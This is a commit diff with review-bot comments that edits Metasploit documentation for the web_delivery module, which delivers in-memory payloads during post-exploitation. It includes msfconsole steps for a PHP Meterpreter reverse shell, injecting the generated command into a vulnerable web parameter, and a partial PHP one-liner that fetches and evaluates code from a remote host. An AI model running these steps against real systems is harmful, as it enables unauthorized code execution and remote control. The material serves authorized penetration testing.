Merge pull request #39 from tdoan-r7/mod_doc_cmd

MS-1196 Minor edits to the kb for the web_delivery module
bug/bundler_fix
sinn3r 2016-03-22 12:34:27 -05:00
commit 9aa5f4f03a
1 changed files with 17 additions and 24 deletions

@ -1,31 +1,26 @@
As a web server, web_delivery provides a great way to deliver a payload during post exploitation, As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
with the intention to stay stealthy because the payload does not touch the disk.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment Powershell. You should be able to tell which one you can use based on the target environment
you are in. you are in.
For example: if you have gained access through a PHP application, then it's safe to assume you can For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
say the target supports Powershell.
## Verification Steps ## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, with the ability To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use web_delivery similar to the following example: At that point, you would use the web_delivery module like in the following example:
1. Start msfconsole 1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery``` 2. Run: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) 3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) 4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to) 5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run``` 6. Do: ```run```
7. At this point, a handler is up for that payload. And the module should instruct you to execute 7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
a command. 8. Copy the command. Depending on your pentesting scenario, you can either inject the
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell and get a session:
command and get code execution, or run it from the target's shell, and get a session:
``` ```
msf exploit(web_delivery) > run msf exploit(web_delivery) > run
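Review bot: Step 6 is left as "6. Do: ```run```" while steps 2 through 5 in this hunk were changed from "Do:" to "Run:"; change it to "6. Run: ```run```" so the list reads consistently. Separately, the reworded example still cites Windows Server 2008 as a system where it is "probably safe to say the target supports Powershell", but the Powershell section later in this same file states that Windows 7 and Windows Server 2008 R2 are the first versions to ship it by default; since that line was being rewritten anyway, "Windows Server 2008 R2" would keep the two sections consistent.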
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
**Python** **Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
**PHP** **PHP**
PHP is a fairly popular language for web servers, especially Apache. PHP is a fairly popular language for web servers, especially Apache.
**Powershell/win** **Powershell/Windows**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
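Review bot: The heading was updated to "**Powershell/Windows**" but the product spelling is left as "Powershell" here and throughout the file; since this hunk touches the heading and the paragraph below it, this is the natural place to switch to "PowerShell" (and ideally apply the same spelling in the rest of the document in the same commit). In the Python paragraph, "as well as Debian" is the one item in the list without a version while Ubuntu and Mac OS X have one; either add the Debian release or reword so the reader does not expect a version there.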
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
One way to approach this would be: One way to approach this would be:
1. Start exploit/multi/script/web_delivery 1. Start exploit/multi/script/web_delivery
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that 2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. 3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade** **Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one. web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
Here's how that can be done: Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/ 1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/pate the command. 2. In msfconsole, interact with the shell, and copy/paste the command.
3. You should get a meterpreter session. 3. You should get a Meterpreter session.
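Review bot: Step 1 of the shell upgrade section still reads "Start exploit/multi/script/web_delivery that generates/", which is a sentence cut off mid-phrase and is carried over unchanged by this edit; since the surrounding lines are being touched, finish it, for example "1. Start exploit/multi/script/web_delivery, which generates a command for the target's interpreter (see the Verification Steps above)", or drop the trailing "that generates/" altogether. The typo fix "copy/pate" to "copy/paste" and the Meterpreter capitalization in steps 2 and 3 look right.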